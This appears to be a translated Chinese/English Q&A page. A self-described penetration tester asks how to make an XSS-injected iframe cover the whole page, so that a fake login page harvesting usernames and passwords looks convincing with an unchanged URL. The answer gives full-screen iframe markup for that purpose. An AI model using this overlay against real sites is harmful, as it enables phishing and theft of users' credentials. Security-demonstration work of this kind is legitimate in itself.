创建一个全屏iframe [英] Creating a full screen iframe

问题描述

我目前正在研究XSS攻击，目的是在客户端演示中使用它们（我是笔测试人员）。我已经编写了一个工具来托管恶意版本的网站登录页面（收集用户名和密码），然后将受害者重定向回原始网站。然而，我一直试图使用iframe来代替它，因为它看起来更具说服力，因为url不会改变。

I'm currently looking into XSS attacks, with the aim of using them in client demonstrations (I'm a pen tester). I've written a tool that will host a malicious version of a website's login page (that harvests usernames and passwords) and then redirects the victim back to the original website. However, I have been trying to get it to work using iframes instead, as it would look far more convincing as the url won't change.

我已经用google搜索了一下这似乎是适当的代码：

I've googled about and this seems to be the appropriate code:

<iframe src="http://192.168.0.1/login.php" style="border: 0; width: 100%; height: 100%">

但创建的iframe绝不是全屏（在Internet Explorer和Firefox上）。以下是截图

but the iframe created is by no means full screen (on internet explorer and firefox). Here is a screenshot

正如您所看到的，iframe登录页面位于您的名字是什么？之下。区域，因此没有接近全屏的地方。我尝试编辑恶意登录页面的css文件，以包括全屏参数，但这也没有效果。

As you can see, the iframe login page is beneath the "what is your name?" area, thus no where near full screen. I've tried editing the css file of the malicious login page, to include full screen parameters, but this has no effect either.

有没有人有解决方案？

Does anyone have any solutions? Thanks!

推荐答案

未经测试，请尝试以下操作：

Not tested, but try this:

<iframe src="http://192.168.0.1/login.php" style="border: 0; position:absolute; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

或

<iframe src="http://192.168.0.1/login.php" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

这篇关于创建一个全屏iframe的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！